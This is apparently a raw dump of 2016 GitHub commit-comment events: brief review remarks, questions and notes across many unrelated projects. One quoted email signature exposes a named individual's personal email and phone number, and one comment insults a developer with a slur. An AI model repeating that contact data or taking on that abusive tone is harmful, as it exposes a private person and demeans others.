{"id":"4518171371","type":"CommitCommentEvent","actor":{"login":"u01jmg3"},"repo":{"name":"u01jmg3/cv"},"payload":{"comment":{"id":18903385,"position":null,"line":null,"path":null,"commit_id":"4b9456c19b3f04db64b5b2944611a2d3054eb4cf","created_at":"2016-09-05T19:46:18Z","updated_at":"2016-09-05T19:46:18Z","body":"```txt\r\nImageMagick-6.9.3-7-Q16-x64-dll.exe\r\nphp_imagick-3.4.2-5.6-ts-vc11-x64\r\n```"}},"created_at":"2016-09-05T19:46:18Z"}
{"id":"4518172586","type":"CommitCommentEvent","actor":{"login":"Kaffeine"},"repo":{"name":"TelepathyQt/telepathy-morse"},"payload":{"comment":{"id":18903388,"position":null,"line":null,"path":null,"commit_id":"e7ebe32bb9e319d3f542fce756b43f45691218c1","created_at":"2016-09-05T19:46:56Z","updated_at":"2016-09-05T19:46:56Z","body":"@gasinvein , yes. e.g. acknowledge of pending messages from another device / client.\r\nhttps://github.com/TelepathyQt/telepathy-morse/blob/master/textchannel.cpp#L271\r\n\r\nPrevious TpQt developer didn't foresee such usage.\r\n\r\nBy the way, I think I have to release TpQt-0.9.8 at the same day as telepathy-morse-0.1.0. I delay the 0.9.8 release (and previously delayed 0.9.7), because I can find other API changes, which would be required by Morse."}},"created_at":"2016-09-05T19:46:56Z"}
{"id":"4518173240","type":"CommitCommentEvent","actor":{"login":"Borlea"},"repo":{"name":"Stumblinbear/BetterRecords"},"payload":{"comment":{"id":18903390,"position":21,"line":156,"path":"src/main/java/com/codingforcookies/betterrecords/client/core/ClientProxy.java","commit_id":"0b9c5aedd14d642f185ae3d69dca441d0c2d4d73","created_at":"2016-09-05T19:47:17Z","updated_at":"2016-09-05T19:47:17Z","body":"Any reason why you don't make ModItems return the actual item instance? Instead of just the base Item class"}},"created_at":"2016-09-05T19:47:17Z"}
{"id":"4518173546","type":"CommitCommentEvent","actor":{"login":"mkhq"},"repo":{"name":"mkhq/kafka-qs-verify"},"payload":{"comment":{"id":18903391,"position":59,"line":59,"path":"src/main/scala/Topologies.scala","commit_id":"d36c62cd8dbedd1229ca439a071da7c9818704f0","created_at":"2016-09-05T19:47:24Z","updated_at":"2016-09-05T19:47:24Z","body":"@miguno No good reason except the -Xexperimental flag needed. Will update the code. The implicit you defined also looks useful for any kafka streams project in scala:\r\n\r\nhttps://github.com/confluentinc/examples/blob/master/kafka-streams/src/main/scala/io/confluent/examples/streams/KeyValueImplicits.scala"}},"created_at":"2016-09-05T19:47:24Z"}
{"id":"4518173833","type":"CommitCommentEvent","actor":{"login":"ariveralee"},"repo":{"name":"ariveralee/ariveralee.github.io"},"payload":{"comment":{"id":18903393,"position":null,"line":null,"path":null,"commit_id":"984a0a26d38eeaecca8be2b04b072f7c64bc96f6","created_at":"2016-09-05T19:47:33Z","updated_at":"2016-09-05T19:47:33Z","body":"lol ;)\n\nOn Sat, Sep 3, 2016 at 9:43 AM, Michael Rivera <notifications@github.com>\nwrote:\n\n> Lolz - that commit message\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ariveralee/ariveralee.github.io/commit/984a0a26d38eeaecca8be2b04b072f7c64bc96f6#commitcomment-18890144>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIxfuTdWoHd3gzORXGZj47Z4vyC2tbXwks5qmXmSgaJpZM4J0TlY>\n> .\n>\n\n\n\n-- \nAlexander L. Rivera\nTemple University '16\nCollege of Science and Technology\nComputer Science Program\narivera.lee@temple.edu\n215-435-2136\n"}},"created_at":"2016-09-05T19:47:33Z"}
{"id":"4518174416","type":"CommitCommentEvent","actor":{"login":"jjaffeux"},"repo":{"name":"SamSaffron/DiscourseMobile"},"payload":{"comment":{"id":18903396,"position":5,"line":60,"path":"js/site_manager.js","commit_id":"a994cbbe6e2f319ab9ee0eb77843c71180c9f61f","created_at":"2016-09-05T19:47:51Z","updated_at":"2016-09-05T19:47:51Z","body":"@SamSaffron why don't we use the site given to the function? If there's a reason for this we should probably find another name for the second site variable."}},"created_at":"2016-09-05T19:47:51Z"}
{"id":"4518174817","type":"CommitCommentEvent","actor":{"login":"jbgi"},"repo":{"name":"scalaz/scalaz"},"payload":{"comment":{"id":18903398,"position":5,"line":5,"path":"base/src/main/scala/data/Maybe.scala","commit_id":"3170dc4b1bdd6a1eb45c57c620e29092d2b59cf5","created_at":"2016-09-05T19:48:03Z","updated_at":"2016-09-05T19:48:03Z","body":"About naming. do we chose `fold` over `cata`?"}},"created_at":"2016-09-05T19:48:03Z"}
{"id":"4518175565","type":"CommitCommentEvent","actor":{"login":"allstaterwel4646"},"repo":{"name":"allstaterwel4646/books"},"payload":{"comment":{"id":18903401,"position":null,"line":null,"path":null,"commit_id":"8d071f30d1d7cde698721c58496ae97c37e7e821","created_at":"2016-09-05T19:48:25Z","updated_at":"2016-09-05T19:48:25Z","body":"Tonight: \r\nGather Envelopes, Documentation, Gym workout setup, Lock, Get chairs out of car, download audio books / window tool get it up\r\nTuesday:\r\n12:00am-12:30am - Check work emails, Enterprise for next Tuesday scheduled, sched ID Power payment, Open docs dloans, check personal emails, receipts overview\r\n12:30am-1:00am update budget, mail out, open docs-Dloans, review bills (print docs/ Had's book if can)\r\n1:00am-1:15am Duolingo\r\n1:15am-1:30am CI Huddle\r\n1:30am-1:45am Break <gather docs you printed>\r\n1:45am-4:00am Eat Lunch, journal, planner updates, writing\r\n4:00am-4:30am lunch sleep\r\n4:30am-5:00am Duolingo\r\n5:00am-5:30am School Loans\r\n5:30am-6:00am Job Search/Applications\r\n6:10am-2:30am Convergys work / R&R\r\n3:00pm-9:30pm Duolingo / Audio / Writing / Planning\r\n10:00pm-1:00am work RR / get home (pack next day/\r\n\r\nGym Bag - Gym clothes packed in it/ two towels, change of clothes, lock, hygiene stuff, binder set up for use: Journal/Plannar/stuff\r\nBinder: Journal, Plannar, Writing, Spanish, studies, folders, section for receipts, section for mail stuff, budget, overall schedule, Important, Evaluations/updates\r\n\r\nsleep til 7:00am-11:30am work AS\r\n12:00-2:30 Conv\r\n3-9:30p AS\r\n10:00-1:00am\r\n\r\nIf no OT by Monday-sign up Thursday OT Convergys"}},"created_at":"2016-09-05T19:48:25Z"}
{"id":"4518176625","type":"CommitCommentEvent","actor":{"login":"chaochinyang"},"repo":{"name":"pencil-code/pencil-code"},"payload":{"comment":{"id":18903404,"position":null,"line":null,"path":null,"commit_id":"4c672822c4895f16eb3b4431ef85144ce4f6e810","created_at":"2016-09-05T19:48:54Z","updated_at":"2016-09-05T19:48:54Z","body":"Hi Alex,\r\n\r\nThere is something not quite right here.  By adding one to MPVAR in the header, you ALWAYS add one field to particles no matter you have lbirthring_depletion=.true. or not.  This increases a waste of space for ALL other users.  You should only do this in your cparam.local.  Also, if fp(:,ibrtime) is not dynamical, i.e., not participate in the particles pde's, you should declare it as one of MPAUX.\r\n\r\nYou could see a similar example in particles_dust.f90 the switch lcalc_uup.  It is for the f-array, but the idea is the same.  If the user set lcalc_uup=.true., he/she should also add three to MAUX in the header of cparam.local, but not in the source code of the modules.\r\n\r\nSincerely,\r\nChao-Chin"}},"created_at":"2016-09-05T19:48:54Z"}
{"id":"4518179231","type":"CommitCommentEvent","actor":{"login":"DavidBluecame"},"repo":{"name":"DavidBluecame/wings"},"payload":{"comment":{"id":18903408,"position":null,"line":null,"path":null,"commit_id":"5e0f82dc673ee37ee0aeea5c2b38c87967f14754","created_at":"2016-09-05T19:50:16Z","updated_at":"2016-09-05T19:50:16Z","body":"Hello,\r\n\r\nI haven't anything pending at the moment. Please do as you wish :-)"}},"created_at":"2016-09-05T19:50:16Z"}
{"id":"4518180301","type":"CommitCommentEvent","actor":{"login":"meveric"},"repo":{"name":"mdrjr/c2_bootini"},"payload":{"comment":{"id":18903410,"position":23,"line":106,"path":"boot.ini","commit_id":"fb113debfa539acbfb6150c7c7ba2fee6ee108bf","created_at":"2016-09-05T19:50:48Z","updated_at":"2016-09-05T19:50:48Z","body":"you have a type here:\r\n${comde}\r\nshould be\r\n${cmode}"}},"created_at":"2016-09-05T19:50:48Z"}
{"id":"4518180331","type":"CommitCommentEvent","actor":{"login":"chrispittman"},"repo":{"name":"chrispittman/framework"},"payload":{"comment":{"id":18903411,"position":null,"line":null,"path":null,"commit_id":"32fac3ad8f5f4165d67f17c137ac7ad8f551c87b","created_at":"2016-09-05T19:50:49Z","updated_at":"2016-09-05T19:50:49Z","body":"In the majority of web apps, routes are distinguished primarily by their URI, and then by their HTTP method.  This change lists route validators in an order that makes checking route validation fail faster, since that process goes through route validators in the order listed here and stops at the first one that fails."}},"created_at":"2016-09-05T19:50:49Z"}
{"id":"4518182567","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Deimoslink/EPAM-test-mockup"},"payload":{"comment":{"id":18903413,"position":41,"line":41,"path":"Project/project.html","commit_id":"75a494d19a8869ae29db88ebb65b4fdd752c2174","created_at":"2016-09-05T19:51:56Z","updated_at":"2016-09-05T19:51:56Z","body":"Можно добавить метод, который будет менять ключ и направление сортировки. Плюс, при смене ключа сортировки не нужно изменять направление.\r\nНапример,\r\n```\r\n<td ng-click=\"sort('id')\">ID</td>\r\n\r\n...\r\n$scope.sort = (key) => {\r\n    if (key !== $scope.sortKey) {\r\n        $scope.sortKey = key;\r\n    }\r\n    else {\r\n        $scope.sortReverse = !$scope.sortReverse;\r\n    }\r\n};\r\n```"}},"created_at":"2016-09-05T19:51:56Z"}
{"id":"4518182863","type":"CommitCommentEvent","actor":{"login":"zouabimourad"},"repo":{"name":"manolo/gwtupload"},"payload":{"comment":{"id":18903414,"position":null,"line":null,"path":null,"commit_id":"c8c13d78e5d6fb09ab38ca4a960b4a58dbbce154","created_at":"2016-09-05T19:52:05Z","updated_at":"2016-09-05T19:52:05Z","body":"Hi,\r\n\r\nHave you plannified a new release with this fix.\r\n\r\nRegards."}},"created_at":"2016-09-05T19:52:05Z"}
{"id":"4518183200","type":"CommitCommentEvent","actor":{"login":"hackthelegacy"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18903415,"position":null,"line":null,"path":null,"commit_id":"c762b62a7e90bfd425e1a9856ae34b55d8eb8ce3","created_at":"2016-09-05T19:52:12Z","updated_at":"2016-09-05T19:52:12Z","body":"For the 5000 users the password is \"PWD\" followed by (almost) random 7 digits ;)\n\nSent from my iPhone\n\n> On 05 Sep 2016, at 21:44, rschoem <notifications@github.com> wrote:\n> \n> @hackthelegacy I think you should add a wordlist as well ;-)\n> \n> ―\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-05T19:52:12Z"}
{"id":"4518183943","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Deimoslink/EPAM-test-mockup"},"payload":{"comment":{"id":18903417,"position":84,"line":84,"path":"Project/project.html","commit_id":"75a494d19a8869ae29db88ebb65b4fdd752c2174","created_at":"2016-09-05T19:52:32Z","updated_at":"2016-09-05T19:52:32Z","body":"Здесь будет переход по роутингу и нужны ссылки."}},"created_at":"2016-09-05T19:52:32Z"}
{"id":"4518184774","type":"CommitCommentEvent","actor":{"login":"AngrySoundTech"},"repo":{"name":"Stumblinbear/BetterRecords"},"payload":{"comment":{"id":18903419,"position":21,"line":156,"path":"src/main/java/com/codingforcookies/betterrecords/client/core/ClientProxy.java","commit_id":"0b9c5aedd14d642f185ae3d69dca441d0c2d4d73","created_at":"2016-09-05T19:52:59Z","updated_at":"2016-09-05T19:52:59Z","body":"[ModItems](https://github.com/Stumblinbear/BetterRecords/blob/master/src/main/java/com/codingforcookies/betterrecords/common/item/ModItems.java) does indeed contain the instances of each item class.\r\n\r\nIn the case of the line commented on, getColorFromItemstack() was split into another interface and require being registered like this. In the future I plan on refactoring this out so all of our items share the same color logic."}},"created_at":"2016-09-05T19:52:59Z"}
{"id":"4518184956","type":"CommitCommentEvent","actor":{"login":"Kaffeine"},"repo":{"name":"TelepathyQt/telepathy-morse"},"payload":{"comment":{"id":18903420,"position":null,"line":null,"path":null,"commit_id":"e7ebe32bb9e319d3f542fce756b43f45691218c1","created_at":"2016-09-05T19:53:05Z","updated_at":"2016-09-05T19:53:05Z","body":"Actually, I think it is the only missing feature (acknowledge of pending messages from another device / client)."}},"created_at":"2016-09-05T19:53:05Z"}
{"id":"4518187772","type":"CommitCommentEvent","actor":{"login":"bnicolas6"},"repo":{"name":"bnicolas6/repositorioDePrueba"},"payload":{"comment":{"id":18903422,"position":null,"line":null,"path":null,"commit_id":"1fe6151cc723b142561eee7dd3df92b0eb704da6","created_at":"2016-09-05T19:54:26Z","updated_at":"2016-09-05T19:54:26Z","body":"#include <stdio.h>\r\n#include <stdlib.h>\r\n\r\nint main (){\r\n\r\n    printf (\"Hola, esto es un 'Hola Mundo'\");\r\n    return 0;\r\n}\r\n\r\n\r\n"}},"created_at":"2016-09-05T19:54:26Z"}
{"id":"4518192291","type":"CommitCommentEvent","actor":{"login":"maveryanov"},"repo":{"name":"WRCP/RasPi"},"payload":{"comment":{"id":18903430,"position":null,"line":null,"path":null,"commit_id":"87f90a123711aad3a5448c4f5dcd06530e11ac9a","created_at":"2016-09-05T19:56:37Z","updated_at":"2016-09-05T19:56:37Z","body":"Это импорт библиотеки работы с портами GIPO"}},"created_at":"2016-09-05T19:56:37Z"}
{"id":"4518195103","type":"CommitCommentEvent","actor":{"login":"artrag"},"repo":{"name":"artrag/TriloTracker-Re-player"},"payload":{"comment":{"id":18903435,"position":null,"line":null,"path":null,"commit_id":"2536d63d5d1641f1b15b38ad9ea3150263656358","created_at":"2016-09-05T19:57:59Z","updated_at":"2016-09-05T19:57:59Z","body":"Note that also lines 330 and 334 are strange: they set and reset the equalization_flag in the same branch \r\nMoreover the flag should be set once at setup, not at each ISR call, as it is now"}},"created_at":"2016-09-05T19:57:59Z"}
{"id":"4518195316","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18903437,"position":55,"line":1344,"path":"src/game/AI/CreatureEventAI.cpp","commit_id":"4e887248518c59ef5f418a6cc6fc9e880aee12b6","created_at":"2016-09-05T19:58:06Z","updated_at":"2016-09-05T19:58:06Z","body":"@cyberium this else is supposed to be inside, not outside"}},"created_at":"2016-09-05T19:58:06Z"}
{"id":"4518195439","type":"CommitCommentEvent","actor":{"login":"RichardZzzz"},"repo":{"name":"RichardZzzz/gh-pages"},"payload":{"comment":{"id":18903438,"position":null,"line":null,"path":null,"commit_id":"bd212fe59ccd801035580e2387f2107b56586c2c","created_at":"2016-09-05T19:58:09Z","updated_at":"2016-09-05T19:58:09Z","body":"merge to master"}},"created_at":"2016-09-05T19:58:09Z"}
{"id":"4518196626","type":"CommitCommentEvent","actor":{"login":"ruslansennov"},"repo":{"name":"gwtproject/gwt"},"payload":{"comment":{"id":18903442,"position":10,"line":164,"path":"user/super/com/google/gwt/emul/java/lang/String.java","commit_id":"468036ade51cd5094403ed2fb206e204c4f08fd3","created_at":"2016-09-05T19:58:42Z","updated_at":"2016-09-05T19:58:42Z","body":"@rluble sorry, the problem was in my IDE which internally uses 2.8.0-rc1 for running codeserver. All works fine if codeserver starts with maven"}},"created_at":"2016-09-05T19:58:42Z"}
{"id":"4518196675","type":"CommitCommentEvent","actor":{"login":"TheFakeMateo"},"repo":{"name":"TheFakeMateo/RedPlusPlus"},"payload":{"comment":{"id":18903443,"position":null,"line":null,"path":null,"commit_id":"cb40cf54edbb29601ce025a1470d9de088bf3844","created_at":"2016-09-05T19:58:43Z","updated_at":"2016-09-05T19:58:43Z","body":"The main part of this update is intended as a fix to https://github.com/TheFakeMateo/RedPlusPlus/commit/b98c9d76f9f59f03ca7470d6d9063acb95767f32 where using the Overworld Map as a buffer caused issues sometimes."}},"created_at":"2016-09-05T19:58:43Z"}
{"id":"4518197706","type":"CommitCommentEvent","actor":{"login":"lukeflima"},"repo":{"name":"lukeflima/Implementa--es-de-Numerico-"},"payload":{"comment":{"id":18903446,"position":null,"line":null,"path":null,"commit_id":"df33df96fa0654a5395c3e3ce6e318c4f51a980a","created_at":"2016-09-05T19:59:14Z","updated_at":"2016-09-05T19:59:14Z","body":"Diego tu acha melhor a gente fazer um simples txt, ou melhor um XML?"}},"created_at":"2016-09-05T19:59:14Z"}
{"id":"4514783336","type":"CommitCommentEvent","actor":{"login":"CindyBoy"},"repo":{"name":"CindyBoy/Cindy"},"payload":{"comment":{"id":18894906,"position":null,"line":null,"path":null,"commit_id":"644067f3dbe22f141b4578a35121fe620e1e59be","created_at":"2016-09-05T02:01:03Z","updated_at":"2016-09-05T02:01:03Z","body":"why 0905"}},"created_at":"2016-09-05T02:01:03Z"}
{"id":"4514783968","type":"CommitCommentEvent","actor":{"login":"hjubb"},"repo":{"name":"theseu5/Apptest2"},"payload":{"comment":{"id":18894912,"position":null,"line":null,"path":null,"commit_id":"0b83f5a0a34bac23c578f8da7d737ab65d26419e","created_at":"2016-09-05T02:01:23Z","updated_at":"2016-09-05T02:01:23Z","body":"clue"}},"created_at":"2016-09-05T02:01:23Z"}
{"id":"4514784277","type":"CommitCommentEvent","actor":{"login":"CindyBoy"},"repo":{"name":"CindyBoy/Cindy"},"payload":{"comment":{"id":18894913,"position":null,"line":null,"path":null,"commit_id":"644067f3dbe22f141b4578a35121fe620e1e59be","created_at":"2016-09-05T02:01:33Z","updated_at":"2016-09-05T02:01:33Z","body":"why2 0905"}},"created_at":"2016-09-05T02:01:33Z"}
{"id":"4514798104","type":"CommitCommentEvent","actor":{"login":"asp94"},"repo":{"name":"asp94/ProgrammingAssignment2"},"payload":{"comment":{"id":18894929,"position":7,"line":2,"path":"cachematrix.R","commit_id":"e9025affca133cb4387f5625a8ccce215b5c4eed","created_at":"2016-09-05T02:09:10Z","updated_at":"2016-09-05T02:09:10Z","body":" ## set x in parent env with the desired value, if inverse is already set, set cache(m) to null!"}},"created_at":"2016-09-05T02:09:10Z"}
{"id":"4514798794","type":"CommitCommentEvent","actor":{"login":"asp94"},"repo":{"name":"asp94/ProgrammingAssignment2"},"payload":{"comment":{"id":18894931,"position":8,"line":3,"path":"cachematrix.R","commit_id":"e9025affca133cb4387f5625a8ccce215b5c4eed","created_at":"2016-09-05T02:09:32Z","updated_at":"2016-09-05T02:09:32Z","body":"  ###store the matrix"}},"created_at":"2016-09-05T02:09:32Z"}
{"id":"4514799425","type":"CommitCommentEvent","actor":{"login":"asp94"},"repo":{"name":"asp94/ProgrammingAssignment2"},"payload":{"comment":{"id":18894933,"position":13,"line":8,"path":"cachematrix.R","commit_id":"e9025affca133cb4387f5625a8ccce215b5c4eed","created_at":"2016-09-05T02:09:53Z","updated_at":"2016-09-05T02:09:53Z","body":"##retrive the stored matrix"}},"created_at":"2016-09-05T02:09:53Z"}
{"id":"4514799734","type":"CommitCommentEvent","actor":{"login":"asp94"},"repo":{"name":"asp94/ProgrammingAssignment2"},"payload":{"comment":{"id":18894934,"position":12,"line":7,"path":"cachematrix.R","commit_id":"e9025affca133cb4387f5625a8ccce215b5c4eed","created_at":"2016-09-05T02:10:04Z","updated_at":"2016-09-05T02:10:04Z","body":"##retrive the stored matrix"}},"created_at":"2016-09-05T02:10:04Z"}
{"id":"4514799888","type":"CommitCommentEvent","actor":{"login":"joel16"},"repo":{"name":"joel16/3DSident"},"payload":{"comment":{"id":18894935,"position":null,"line":null,"path":null,"commit_id":"2dbdb1dbdbe0950c61c859d1bb724cc390aa931a","created_at":"2016-09-05T02:10:10Z","updated_at":"2016-09-05T02:10:10Z","body":"Don't know what the fuck happened there LOL, it's probably because I was using the repository on my desktop, which later gets merged into my git repository before I push commits. Anyways fixed https://github.com/joel16/3DSident/commit/8b0f2fd4818dd6039d0ded194666746f780653fe"}},"created_at":"2016-09-05T02:10:10Z"}
{"id":"4514800345","type":"CommitCommentEvent","actor":{"login":"LaisFr"},"repo":{"name":"ViniciusPaespo/Projeto-ESI"},"payload":{"comment":{"id":18894936,"position":null,"line":null,"path":null,"commit_id":"977c2d8017a2118f51c11f0a4046d60a5cd6cb4a","created_at":"2016-09-05T02:10:22Z","updated_at":"2016-09-05T02:10:22Z","body":"."}},"created_at":"2016-09-05T02:10:22Z"}
{"id":"4514800889","type":"CommitCommentEvent","actor":{"login":"asp94"},"repo":{"name":"asp94/ProgrammingAssignment2"},"payload":{"comment":{"id":18894938,"position":34,"line":15,"path":"cachematrix.R","commit_id":"e9025affca133cb4387f5625a8ccce215b5c4eed","created_at":"2016-09-05T02:10:40Z","updated_at":"2016-09-05T02:10:40Z","body":"## Calculates the inverse"}},"created_at":"2016-09-05T02:10:40Z"}
{"id":"4514801553","type":"CommitCommentEvent","actor":{"login":"asp94"},"repo":{"name":"asp94/ProgrammingAssignment2"},"payload":{"comment":{"id":18894939,"position":36,"line":26,"path":"cachematrix.R","commit_id":"e9025affca133cb4387f5625a8ccce215b5c4eed","created_at":"2016-09-05T02:11:04Z","updated_at":"2016-09-05T02:11:04Z","body":"#get the cached value"}},"created_at":"2016-09-05T02:11:04Z"}
{"id":"4514801933","type":"CommitCommentEvent","actor":{"login":"asp94"},"repo":{"name":"asp94/ProgrammingAssignment2"},"payload":{"comment":{"id":18894940,"position":41,"line":31,"path":"cachematrix.R","commit_id":"e9025affca133cb4387f5625a8ccce215b5c4eed","created_at":"2016-09-05T02:11:17Z","updated_at":"2016-09-05T02:11:17Z","body":" #displays inverse"}},"created_at":"2016-09-05T02:11:17Z"}
{"id":"4514808525","type":"CommitCommentEvent","actor":{"login":"greatwolf"},"repo":{"name":"butor/blackbird"},"payload":{"comment":{"id":18894944,"position":null,"line":null,"path":null,"commit_id":"9fb6aa4c37d2a5ffd6846ce13f62db9f46688a96","created_at":"2016-09-05T02:14:44Z","updated_at":"2016-09-05T02:14:44Z","body":"Instead of `malloc/free` why not just group the balances together and use a `vector`?"}},"created_at":"2016-09-05T02:14:44Z"}
{"id":"4514810198","type":"CommitCommentEvent","actor":{"login":"orbea"},"repo":{"name":"libretro/gambatte-libretro"},"payload":{"comment":{"id":18894947,"position":null,"line":null,"path":null,"commit_id":"24551644bee25534c12ccb6ddebd1e4266d727fe","created_at":"2016-09-05T02:15:32Z","updated_at":"2016-09-05T02:15:32Z","body":"An install target should never install to the user directories.\r\n\r\nA good location would be `$(DESTDIR)/usr/local/lib/libretro`"}},"created_at":"2016-09-05T02:15:32Z"}
{"id":"4514814323","type":"CommitCommentEvent","actor":{"login":"fidele007"},"repo":{"name":"fidele007/khmer-smarter-keyboard"},"payload":{"comment":{"id":18894951,"position":null,"line":null,"path":null,"commit_id":"72a0295a6b72962e4161ad33e36a47cabc288085","created_at":"2016-09-05T02:17:45Z","updated_at":"2016-09-05T02:17:45Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;MeawaqGn&#x2F;21-feature-re-add-in-the-app\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> [Feature] Re-add កំណត់ការប្រើប្រាស់ in the app</a>"}},"created_at":"2016-09-05T02:17:45Z"}
{"id":"4514817222","type":"CommitCommentEvent","actor":{"login":"henry995821881"},"repo":{"name":"henry995821881/java"},"payload":{"comment":{"id":18894955,"position":null,"line":null,"path":null,"commit_id":"d63fb02ae698814b2132799ba70db597d3e5c465","created_at":"2016-09-05T02:19:28Z","updated_at":"2016-09-05T02:19:28Z","body":"开启ehcache"}},"created_at":"2016-09-05T02:19:28Z"}
{"id":"4514826925","type":"CommitCommentEvent","actor":{"login":"melonq"},"repo":{"name":"soulout/react-practice"},"payload":{"comment":{"id":18894961,"position":null,"line":null,"path":null,"commit_id":"3102310fdf8c009cb0888cf54a800c7a26513ea5","created_at":"2016-09-05T02:24:47Z","updated_at":"2016-09-05T02:24:47Z","body":"IndexRoute: https://github.com/reactjs/react-router/blob/febab4e1052d91df20944ffdf09a36a89a5b1f5c/docs/guides/basics/IndexRoutes.md\r\n\r\nNotFoundRoute: https://github.com/reactjs/react-router/blob/0625e7656d21863563cf59019cfc16b800b79e85/upgrade-guides/v1.0.0.md#notfound-route"}},"created_at":"2016-09-05T02:24:47Z"}
{"id":"4514827518","type":"CommitCommentEvent","actor":{"login":"Zeaa"},"repo":{"name":"easefun/polyv-ios-client-demo"},"payload":{"comment":{"id":18894963,"position":null,"line":null,"path":null,"commit_id":"bcdaaa43c6fa119cdd69b3da25225766a974d43e","created_at":"2016-09-05T02:25:03Z","updated_at":"2016-09-05T02:25:03Z","body":"@Qinbo1027  这个方法不能。直播需要另外从服务器拿到接口请求截图回来，点播这里现在也增加了加密视频的截图功能"}},"created_at":"2016-09-05T02:25:03Z"}
{"id":"4514828269","type":"CommitCommentEvent","actor":{"login":"industrialtechnology"},"repo":{"name":"industrialtechnology/PLCprogramming"},"payload":{"comment":{"id":18894965,"position":null,"line":null,"path":null,"commit_id":"e2dca4561a5a5cd3f2f016f45ae85541836ff753","created_at":"2016-09-05T02:25:26Z","updated_at":"2016-09-05T02:25:26Z","body":"This area will contain all PLC programming example projects. The first will be a one rung car retrieval program.  In addition we want to show the best practice PLC programming approach as designated by [PLC Training Org](http://plc-training.org). Of course best practice PLC programming will definitely not be the one rung solution, but we want to show how it is possible for educational purposes."}},"created_at":"2016-09-05T02:25:26Z"}
{"id":"4514830471","type":"CommitCommentEvent","actor":{"login":"fundies"},"repo":{"name":"enigma-dev/enigma-dev"},"payload":{"comment":{"id":18894967,"position":null,"line":null,"path":null,"commit_id":"016ebd05315f11030c0f2c3296d79b5ee053a1a3","created_at":"2016-09-05T02:26:40Z","updated_at":"2016-09-05T02:26:40Z","body":"@RobertBColton wow you're retarded learn difference between ID and a Name please. This needs reverting. Also ID should be Identifier to match the other ey files outside of universal"}},"created_at":"2016-09-05T02:26:40Z"}
{"id":"4514831159","type":"CommitCommentEvent","actor":{"login":"MarvinCorro"},"repo":{"name":"ckyle93/SlugChat"},"payload":{"comment":{"id":18894969,"position":null,"line":null,"path":null,"commit_id":"8b2bba20cce4b3a147828bd25fd290ea919cdc52","created_at":"2016-09-05T02:27:05Z","updated_at":"2016-09-05T02:27:05Z","body":"can't tell if this is a legit new recent commit or github just messed up"}},"created_at":"2016-09-05T02:27:05Z"}
{"id":"4514832287","type":"CommitCommentEvent","actor":{"login":"huacnlee"},"repo":{"name":"wuxsoft/myblog"},"payload":{"comment":{"id":18894972,"position":1,"line":1,"path":"app/assets/javascripts/editor.js","commit_id":"50302e6a5628b76a70aa04b2d0f79b2aa18245b8","created_at":"2016-09-05T02:27:45Z","updated_at":"2016-09-05T02:27:45Z","body":"尝试用 CoffeeScript 改写"}},"created_at":"2016-09-05T02:27:45Z"}
{"id":"4514844284","type":"CommitCommentEvent","actor":{"login":"malept"},"repo":{"name":"data-axle/superstore"},"payload":{"comment":{"id":18894986,"position":null,"line":null,"path":null,"commit_id":"81dbac521e3e79e47a3702fcdd6751cbaa32a955","created_at":"2016-09-05T02:33:56Z","updated_at":"2016-09-05T02:33:56Z","body":"_I searched for a bit and couldn't find a reference to where Rails devs have declared that they actually do some variation on semantic versioning. (If you happen to have a reference, that would be great to read.) But I digress._\r\n\r\n> Things to discuss, which are all qualitative, are: [...]\r\n\r\nIn my experience, users tend to prefer \"release early and often\" rather than \"bundle a bunch of changes and release a new minor version in a month\". Of course, can be dependent on the language community and kind of project this is. Ruby/Rails developers may be less averse to use git references in `Gemfile` than Node/Electron developers in `package.json`, for example. One way we could address both ends of the spectrum is to utilize pre-releases.\r\n\r\nPersonally, I do not mind when a library releases a new minor version with one new feature. It shouldn't (in theory) break my app, so it can auto-update if it wants to. The only thing that bothers me is when there's several major versions in a row, which is what I avoided in an unrelated project the other day. It involved a lot of breaking changes that I wanted to make - going from version 7 to version 10 in quick succession would have been rather jarring. On the other hand, going from version 7.1.0 to version 7.4.0 (with between 1 and 3 NEWS-worthy changes per release) isn't as bad.\r\n\r\n> In this case, it looks like the new Rails 5 support was not entirely complete.\r\n\r\nWhat's missing?"}},"created_at":"2016-09-05T02:33:56Z"}
{"id":"4514845971","type":"CommitCommentEvent","actor":{"login":"simnalamburt"},"repo":{"name":"rust-kr/rust-kr.org"},"payload":{"comment":{"id":18894990,"position":null,"line":null,"path":null,"commit_id":"236239e5e22b72eb7c75f49ef4b6bf733e29dbee","created_at":"2016-09-05T02:34:50Z","updated_at":"2016-09-05T02:34:50Z","body":"`Fn(&mut Request, Response) -> IronResult<Response>`는 AfterMiddleware를 구현하는데 `Fn(&mut Request, IronError) -> IronResult<Response>`는 AfterMiddleware를 구현하지 않더라구요. 후자가 가능하면 함수를 밖으로 빼지 않고도 코드에 불필요한 인덴트가 많이 없어질거같은데 좋은 방법이 없나요?"}},"created_at":"2016-09-05T02:34:50Z"}
{"id":"4514855710","type":"CommitCommentEvent","actor":{"login":"zhangzi0291"},"repo":{"name":"zhangzi0291/wechat"},"payload":{"comment":{"id":18895004,"position":null,"line":null,"path":null,"commit_id":"f0f5460c5f1139eca4a8946385f0a35e4783537b","created_at":"2016-09-05T02:40:11Z","updated_at":"2016-09-05T02:40:11Z","body":"sql文件"}},"created_at":"2016-09-05T02:40:11Z"}
{"id":"4514857781","type":"CommitCommentEvent","actor":{"login":"ckyle93"},"repo":{"name":"ckyle93/SlugChat"},"payload":{"comment":{"id":18895008,"position":null,"line":null,"path":null,"commit_id":"8b2bba20cce4b3a147828bd25fd290ea919cdc52","created_at":"2016-09-05T02:41:17Z","updated_at":"2016-09-05T02:41:17Z","body":"Legit commit, I was messing around with implementing the quiz stuff. As it stands right now, the quiz stuff is in a semi functional state but needs a lot of work before integrating with master.\r\n"}},"created_at":"2016-09-05T02:41:17Z"}
